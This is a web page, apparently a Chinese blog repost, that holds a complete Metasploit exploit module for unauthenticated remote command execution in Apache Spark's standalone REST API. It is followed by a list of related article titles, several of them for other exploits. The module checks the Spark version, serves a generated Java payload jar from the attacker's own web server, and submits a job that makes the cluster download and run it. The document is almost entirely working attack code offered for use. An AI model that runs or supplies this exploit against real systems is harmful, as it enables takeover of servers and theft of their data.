##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'Apache Spark Unauthenticated Command Execution',

      'Description'    => %q{

          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.

          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'aRe00t',                            # Proof of concept

          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module

        ],

      'References'     =>

        [

          ['URL', 'https://www.jianshu.com/p/a080cb323832'],

          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']

        ],

      'Platform'       => 'java',

      'Arch'           => [ARCH_JAVA],

      'Targets'        =>

        [

          ['Automatic', {}]

        ],

      'Privileged'     => false,

      'DisclosureDate' => 'Dec 12 2017',

      'DefaultTarget'  => 0,

      'Notes'          =>

        {

          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],

          'Stability'   => [ CRASH_SAFE ],

          'Reliability' => [ REPEATABLE_SESSION]

        }

    ))

    register_options [

      Opt::RPORT(6066),

      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])

    ]

  end

  def check

    return CheckCode::Detected if get_version

    CheckCode::Unknown

  end

  def primer

    path = service.resources.keys[0]

    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'

    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)

  end

  def exploit

    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status("Generating payload ...")

    @pl = generate_payload.encoded_jar(random:true)

    print_error("Failed to generate the payload.") unless @pl

    print_status("Starting up our web service ...")

    Timeout.timeout(datastore['HTTPDELAY']) { super }

  rescue Timeout::Error

  end

  def get_version

    @version = nil

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path),

      'method'        => 'GET'

    )

    unless res

      vprint_bad("#{peer} - No response. ")

      return false

    end

    if res.code == 401

      print_bad("#{peer} - Authentication required.")

      return false

    end

    unless res.code == 400

      return false

    end

    res_json = res.get_json_document

    @version = res_json['serverSparkVersion']

    if @version.nil?

      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")

      return false

    end

    true

  end

  def send_payload(payload_uri)

    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)

    data =

    {

      "action"                    => "CreateSubmissionRequest",

      "clientSparkVersion"        => @version.to_s,

      "appArgs"                   => [],

      "appResource"               => payload_uri.to_s,

      "environmentVariables"      => {"SPARK_ENV_LOADED" => ""},

      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",

      "sparkProperties"           =>

      {

        "spark.jars"              => payload_uri.to_s,

        "spark.driver.supervise"  => "false",

        "spark.app.name"          => rand_appname.to_s,

        "spark.eventLog.enabled"  => "true",

        "spark.submit.deployMode" => "cluster",

        "spark.master"            => "spark://#{rhost}:#{rport}"

      }

    }

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),

      'method'        => 'POST',

      'ctype'         => 'application/json;charset=UTF-8',

      'data'          => data.to_json

    )

  end

  # Handle incoming requests

  def on_request_uri(cli, request)

    print_status("#{rhost}:#{rport} - Sending the payload to the server...")

    send_response(cli, @pl)

  end

end

[EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. [EXP]Huawei Router HG532e - Command Execution

    #!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,req ...

  4. [EXP]Apache Tika-server < 1.18 - Command Injection

    #################################################################################################### ...

  5. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  7. Why Apache Spark is a Crossover Hit for Data Scientists [FWD]

    Spark is a compelling multi-purpose platform for use cases that span investigative, as well as opera ...

  8. Apache Spark源码走读之13 -- hiveql on spark实现详解

    欢迎转载,转载请注明出处,徽沪一郎 概要 在新近发布的spark 1.0中新加了sql的模块,更为引人注意的是对hive中的hiveql也提供了良好的支持,作为一个源码分析控,了解一下spark是如何 ...

  9. Apache Spark 2.2.0 中文文档

    Apache Spark 2.2.0 中文文档 - 快速入门 | ApacheCN Geekhoo 关注 2017.09.20 13:55* 字数 2062 阅读 13评论 0喜欢 1 快速入门 使用 ...

随机推荐

  1. Java学习笔记(十四):java常用的包

  2. 解题(TakeBusChooseLine)

    题目描述 从小明家所在公交站出发有n路公交到公司,现给出每路公交的停站数(不包括起点和终点),及每次停的时间(一路车在每个站停的时间相同)和发车的间隔,先假定每辆车同时在相对时间0分开始发车,且所有车 ...

  3. javascript实现文字逐渐显现

    下面是文字逐渐显现的JS代码<pre id="wenzi"></pre><div style="display:none" id= ...

  4. ucore-lab1-练习5report

    实验5--实现函数调用堆栈跟踪函数 需要完成kdebug.c中函数print_stackframe的实现,可以通过函数print_stackframe来跟踪函数调用堆栈中记录的返回地址. 一.函数堆栈 ...

  5. java编译时出现——注:使用了未经检查或不安全的操作。注:有关详细信息,请使用 -Xlint:unchecked 重新编译

    网上说是泛型问题 private List<Product> products = new ArrayList<Product>(); 这种用法绝对没错!(因为是照着书写的)在 ...

  6. jquery判断是否是空对象 不含任何属性

    code function isEmptyObject(e) { var t; for (t in e) return !1; return !0 }

  7. CentOS上部署.net core

    1.阿里云更换系统安装CentOS7.4 64位版本 2.试用XShell 5 登录服务器 参考https://www.microsoft.com/net/learn/get-started/linu ...

  8. maven打包自定义jar到maven仓库

    mvn install:install-file -Dfile=F:/Sdk4j.jar -DgroupId=com.sdk4j -DartifactId=sdk4j -Dversion=1.0 -D ...

  9. TensorFlow环境搭建

    1.使用pip安装TensorFlow 第一步安装pip: 先安装python 官网下载地址https://www.python.org在里面选择适合自己的版本 安装python的过程中pip也会随之 ...

  10. 131.leetcode-Palindrome Partitioning

    解法一. class Solution { public: vector<vector<string>> partition(string s) { vector<vec ...